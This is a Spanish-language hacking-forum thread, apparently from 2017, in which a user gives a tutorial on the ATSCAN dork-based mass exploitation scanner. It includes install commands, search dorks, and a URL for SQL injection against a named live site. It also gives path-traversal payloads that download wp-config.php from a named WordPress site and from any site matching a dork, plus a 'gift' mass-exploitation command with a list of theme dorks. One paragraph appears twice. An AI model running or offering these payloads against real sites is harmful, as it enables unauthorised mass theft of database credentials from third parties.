Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

ATSCAN- Advanced search / Dork / Mass Exploitation Scanner

  • 1 Respuestas
  • 3048 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Agosto 14, 2017, 04:08:21 am »
ATSCAN
Advanced Search / Dork / Mass Exploitation Scanner :P



ATSCAN, es un framework automatizado, que nos permite encontrar servidores vulnerables por medio de avanzadas metodologías de escaneo, por otra parte nos permite a su vez testear si el servidor es vulnerable o no.

Sin duda una herramienta que nos puede ahorrar mucho tiempo en nuestras auditorias cuando no dispongamos de un tiempo prolongado, deben tener en cuenta que la búsqueda se define por los "Motores" como:

Google / Bing / Ask / Yandex / Sogou

Ya explicado como funciona la herramienta, pueden ver las funciones que tiene ATSCAN.

Descripción:

Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
Mass Dork Busqueda
Múltiples escaneos instantáneos.
Explotación masiva
Usa proxy.vulnerables mediante "DORKS"
Agente de usuario aleatorio.
Motor aleatorio.
Extern comandos de ejecución.
Escáner XSS / SQLI / LFI / AFD.
Filtre los sitios wordpress y Joomla en el servidor.
Buscar la página de administración.
Decodificar y codificar Base64 / MD5
Escaneado de puertos.
Extraer IPs
Extraiga correos electrónicos.
Detección automática de errores.
Detección automática de Cms.
Datos de correos.
Repetidor de secuencia automática.
Validación.
Publicar y obtener el método GET

Descarga:

Código: [Seleccionar]
root@kali:~# https://github.com/AlisamTechnology/ATSCAN.git
luego de descarga el paquete de ATSCAN, procederemos a entrar a su carpeta respectiva y establecer permisos al archivo principal.

Código: [Seleccionar]
root@kali:~# cd ATSCAN
root@kali:~/ATSCAN# chmod +x ./atscan.pl

posteriormente pasaremos a darle permisos al archivo de instalación y ejecutarlo.

Código: [Seleccionar]
root@kali:~#  chmod +x ./install.sh
root@kali:~#  ./install.sh

luego de instalar todos las depencias que necesita ASTCAN, pueden ejecutarlo de la siguiente manera para probar, si no tienen ningun error, de la siguiente manera:

Código: [Seleccionar]
root@kali:~# atscan


Como vemos la herramienta nos carga correctamente, si ustedes añaden la opción: atscan --help podrán ver las formas de uso que pueden utilizar.



como pueden ver, en la imagen no nos muestra las demás opciones porque son demasiadas, pero ustedes podrán verlo en su terminal, o simplemente pueden visitar la pagina Github donde se encuentra la herramienta:

https://github.com/AlisamTechnology/ATSCAN


NO quiero ser despreciativo con mis palabras, pero eh visto muchos tutoriales hace meses y hasta ahora que ejecutan el siguiente argumento para elaborar sus tutoriales:

atscan --dork "eventos.php" --level 10 --xss

 voy a explicar esta metodología es ordinaria:

--dork = en ese parametro añadiremos la dork que deseamos realizar la busqueda.

--level = la cantidad de niveles de escaneo que queremos que se realice.

--xss = especificamos buscar solo fallas "CROSS-SITE-SCRIPTING"

Código: [Seleccionar]
[::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] SCAN:: [XSS]
 [::] ENGINE:: [DEFAULT BING bn-IN]
 [::] DORK:: [eventos.php?]
 [::] LEVEL:: [10]


Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":

Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":


Código: [Seleccionar]
root@kali:~# atscan --dork "noticias.php?" --xss --level 10 -m 2
 [::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] SCAN:: [XSS]
 [::] ENGINE:: [GOOGLE dz]
 [::] DORK:: [noticias.php?]
 [::] LEVEL:: [10]

-m = 2  >> Google

la diferencia de google, es que por mas que te conectes a un servidor de otro país, la palabra buscada siempre sera "indexeada" y tu servidor reconocido por ende los resultados serán orgánicos.
 
estas son las opciones que puedes utilizar para escoger a tu indexeador.

[Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]

Continuando con el escaneo podemos observar que hemos encontrado un servidor vulnerable, en el primer escenario tenemos una vulnerabilidad "MYSQL" expuesto a una explotación SQL INJECTION, se preguntaran el porque, es porque hemos utilizado una dork con el ultimo termino "?" acompañado de nuestra búsqueda personalizada.



http://www.izquierdo-asociados.com/noticias.php?id=39%270x27



Testando la vulnerabilidad mediante SQLMAP:



(REPORTADO)

bastante útil verdad, una búsqueda aleatoria, ahora probemos encontrando un servidores en wordpress vulnerables.
Utilizaremos el exploit que afecta un tema de wordpress conocido como /ypo-theme/

Código: [Seleccionar]
##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################

 Añadiremos a la terminal:

Código: [Seleccionar]
atscan --dork "inurl:/wp-content/themes/ypo-theme/" --level 100 -m 2 --exp "/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php" --wp --wpafd

inurl:/wp-content/themes/ypo-theme/ >> Búsqueda de directorios del tema
--level >> la cantidad de niveles de escaneo que queremos que se realice.
--exp  >> Exploit en nuestro caso:

/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php


 [::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] EXPLOIT:: [1 Exploit(s)]
 [::] SCAN:: [AFD]
 [::] GET:: [WP sites]
 [::] ENGINE:: [GOOGLE bs]
 [::] DORK:: [inurl:/wp-content/themes/ypo-theme/]
 [::] LEVEL:: [100]



el resultado fue impresionante, entraremos a un link para comprobar si tenemos el documento sensible WP.

Ejemplo deben añadir el exploit de esta manera en su navegador:

http://www.gynesurgery.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php



continuamos, una ves descargado el archivo vamos abrirlo:



Su uso es fácil, si sabes comprender algunos argumentos necesarios.
si desean explotar otros "0days", pueden ingresar al siguiente enlace:

https://www.exploit-db.com/

Un regalo de mi parte:


Código: [Seleccionar]
atscan --dork ""Index of" +/wp-content/themes/IncredibleWP/" --level 100 -m 2 --exp "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" --wp --wpafd

"Index of" +/wp-content/themes/IncredibleWP/"
"Index of" +/wp-content/themes/ultimatum"
"Index of" +/wp-content/themes/medicate/"
"Index of" +/wp-content/themes/Avada/"
"Index of" +/wp-content/themes/beach_apollo/"

Exploit: "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"


Happy Hacking!

un consejo personal

Como sabemos Google es un servicio de indexación  de paginas web's, entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva, el procedimiento de google, es una búsqueda respectiva de la palabra "noticias.php?id=" que recopila el código fuente de información de todas las plataformas web que contengan la palabra "noticias.php?id=" y obtener el resultado de las mismas.

Hace mucho tiempo elabore algunos POST relacionado a la auditoria de plataformas web de forma manual, por medio de distintos métodos para encontrar vulnerabilidades que un Escaner no pueden encontrar, si deseas aprender esta metodología puedes visitar el siguiente articulo:

http://www.backtrack-omar.blogspot.com//2015/11/como-debo-empezar-para-auditar-un.html

Si deseas aprender como utilizar las dorks de google manualmente, los invito a leer el siguiente articulo:

http://www.backtrack-omar.blogspot.com/2015/09/method-ninja-of-google-hacking.html

Hoy en día, se están creando muchos "Frameworks" y herramientas que nos permiten optimizar todo este proceso, pero con solo un 70 % de posibilidades positivas, ya que una herramienta solamente sigue patrones establecidos, y auditar de forma manual, lleva todas tus capacidades de experiencia al limite para poder encontrar un agujero de seguridad hasta en la sopa.


Saludos!

« Última modificación: Agosto 15, 2017, 12:43:21 am por Gabriela »

Desconectado DUDA

  • *
  • Underc0der
  • Mensajes: 334
  • Actividad:
    0%
  • Reputación 1
  • Hago pocas cosas, pero las hago bien.
    • Ver Perfil
« Respuesta #1 en: Agosto 14, 2017, 06:09:25 pm »
Muy buen aporte bro! voy a aplicarlo a ver que cuenta. +Karma

Gracias por leer,
DUDA
« Última modificación: Agosto 15, 2017, 12:44:13 am por Gabriela »

 

¿Te gustó el post? COMPARTILO!



Auditando con Nessus Vulnerability Scanner

Iniciado por BrowserNet

Respuestas: 0
Vistas: 3978
Último mensaje Mayo 21, 2016, 09:20:16 pm
por BrowserNet
JexBoss - Scanner y explotador de fallas

Iniciado por ANTRAX

Respuestas: 1
Vistas: 3543
Último mensaje Mayo 13, 2017, 05:40:27 pm
por BrowserNet
Damn Small XSS Scanner

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2276
Último mensaje Septiembre 20, 2018, 11:07:57 am
por ANTRAX
XSS Scanner BETA 1.1

Iniciado por Unlocker

Respuestas: 0
Vistas: 1940
Último mensaje Septiembre 12, 2014, 06:03:41 am
por Unlocker
Google Dork ad by Me & Underc0de team! xD

Iniciado por kn0w

Respuestas: 5
Vistas: 3396
Último mensaje Diciembre 01, 2013, 11:38:36 pm
por CrazyKade